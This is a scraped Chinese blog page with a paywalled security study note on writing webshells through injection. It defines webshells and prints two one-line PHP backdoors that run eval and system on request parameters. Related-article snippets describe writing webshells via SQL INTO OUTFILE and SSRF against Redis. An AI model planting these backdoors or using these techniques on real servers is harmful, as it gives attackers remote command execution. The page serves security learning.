知识总结 | 注入写webshell

VIP文章 已于 2022-03-25 15:07:05 修改
阅读量3.4k 收藏 11
点赞数 3
分类专栏: 安全学习日志 文章标签: 安全 web安全 php
于 2022-03-25 15:04:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/123735864
版权

一、什么是webshell?

​ webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以称为一种网页后门。

​ 黑客在入侵在一个网站后,通常会将asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php的后门,得到一个命令执行环境,以达到控制网站服务器的目的。

image-20220324215346591

一句话木马

​ 在很多渗透测试过程中,渗透测试人员会上传一句话木马到目标服务器目录继而提权获取系统权限,不论asp、php、jsp都是如此

简单的一句话PHP木马:

<?php @eval($_POST['password']);?>

<?php @system($_GET['password']);?>

<?php @
最低0.47元/天 解锁文章
1erkeU
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第01篇:MySQL注入WebShell的5种方式1
08-03
1、在默认数据库 test 中创建测试表admin和测试数据,新建test用户授予FILE权限 2、使用test用户连接 1、利用Union select
webshell的几种方式
weixin_43239236的博客
01-24 2139
测试:pikachu平台 研究了几种webshell的方式 一、上传漏洞入 包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html 二、sql注入入 前提是有root权限 sql注入入一句话木马 可以根据本地包含报错查找路径 C:\xampp\htdocs\pikachu\vul\fileinclude 也可以根据 union select 1,@@datadir查找mysql data路径 C:\xam
命令执行漏洞多种webshell方式总结
Thunderclap的博客
02-24 2373
, 这些字符与双引号一起使用时具有特殊含义,并且在显示之前对其进行评估。单引号中的任何字符都没有特殊含义, 当你不想使用转义字符来更改 shell 脚本解释输入字符串参数方式时,就会很方便。简而言之,shell 将逐字解释单引号内的封闭文本,并且不会插入任何内容,包括变量、反引号、某些 \ 转义符等。在windows中,批处理需要转义字符主要有 “&”,“|”,“”等等,转义字符为”^”在Linux中,需要转义字符主要是 单引号 或者双引号 对于单引号,我们将其替换为\47即可。
2024HVV行动-蓝队面试纯干货
Welcome To Myon'Blog !
04-01 1546
冰蝎3.0内置的默认内置16个ua(user-agent)头 content-length 请求长度,对于上传文件,命令执行来讲,加密的参数不定长,但是对于密钥交互,获取基本信息来讲,payload 都为定长。选择默认脚本编码生成的情况下,jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征,php,asp则为普通的一句话木马。常用函数:if()、length()、substring()、substr()
hive建表语法中的分隔符设定
12-22 4979
FIELDS TERMINATED BY:设置字段与字段之间的分隔符 COLLECTION ITEMS TERMINATED BY:设置一个复杂类型(array,struct)字段的各个item之间的分隔符 MAP KEYS TERMINATED BY:设置一个复杂类型(Map)字段的key value之间的分隔符 LINES TERMINATED BY:设置行与行之间的
mysql terminated_LINES TERMINATED BY和FIELDS TERMINATED BY的多种可能性 - MySQL
weixin_35545563的博客
01-19 1745
I'm trying to create a feature in my Content Management System in which users can upload a CSV file which is then parsed and the data is put in a MySQL database. To do this I use a file input and this...
SQL注入WebshellLines terminated by入)
faclon666的博客
03-31 651
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来webshell。1.当mysql注入点为盲注或报错,Union select入是不能利用的,那么可以通过分隔符入(SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
SQL注入-getshell
LJH1999ZN的博客
02-15 9848
一、getshell的含义 1.什么是shellShell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
mysql导出.csv文件
m0_37561039的博客
10-30 586
首先要进入mysql命令行,输入 SHOW VARIABLES LIKE '%secure%';获取secure_file_priv的值,该值是csv文件的存放路径。 具体操作过程如下图所示 然后将数据库中的表按如下指令导出.csv文件 select * from t_user into outfile 'C:/ProgramData/MySQL/MySQL Server 5.7/Upl...
MySQL的其它优化
weixin_39757139的博客
03-07 235
MySQL的其他优化
【数据库】sql语句汇总(四)
m0_57840386的博客
05-19 497
/*SQL语句备份与恢复*/ 1.SQL语句备份: ①导出表数据----------- 使用SELECT INTO … OUTFILE语句将表数据导出到一个文本文件中,语法格式如下: SELECT * INTO OUTFILE ‘FILENAME’ [FIELDS [TERMINATED BY ‘string’] [[OPTIONALLY] ENCLOSED BY ‘char’] [ESCAPED BY ‘char’] ] [LINES TERMINATED BY ‘string’];2.比如用不同的后缀
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
主要介绍了浅谈一次与sql注入 & webshell 的美丽“邂逅”,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
通过SSRF操作Redis主从复制Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 919
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
安全运维 -- splunk 操作手册
最新发布
leeezp的博客
04-30 929
日常运维操作笔记 (持续更新)
Go语言的map并发读如何保证安全
技术笔记
04-28 1053
为了保证Go语言中map的并发安全,我们可以使用互斥锁(如sync.Mutex或)来保护对map的访问,或者使用并发安全的map实现(如sync.Map选择哪种方式取决于具体的应用场景和需求。在大多数情况下,使用互斥锁是一个灵活且可靠的选择,而sync.Map则适用于特定的读多少场景。推荐阅读Golang实战项目分享Golang专栏Go语言异常处理方式。
网络安全实训Day16
Yisitelz的博客
04-26 1357
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
sql注入webshell
06-28
如果攻击者成功地注入了SQL代码,他们可以执行任意操作,包括WebshellWebshell是一种恶意代码,可以在受攻击的服务器上创建一个远程访问接口,允许攻击者执行任意命令。攻击者可以使用Webshell来窃取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值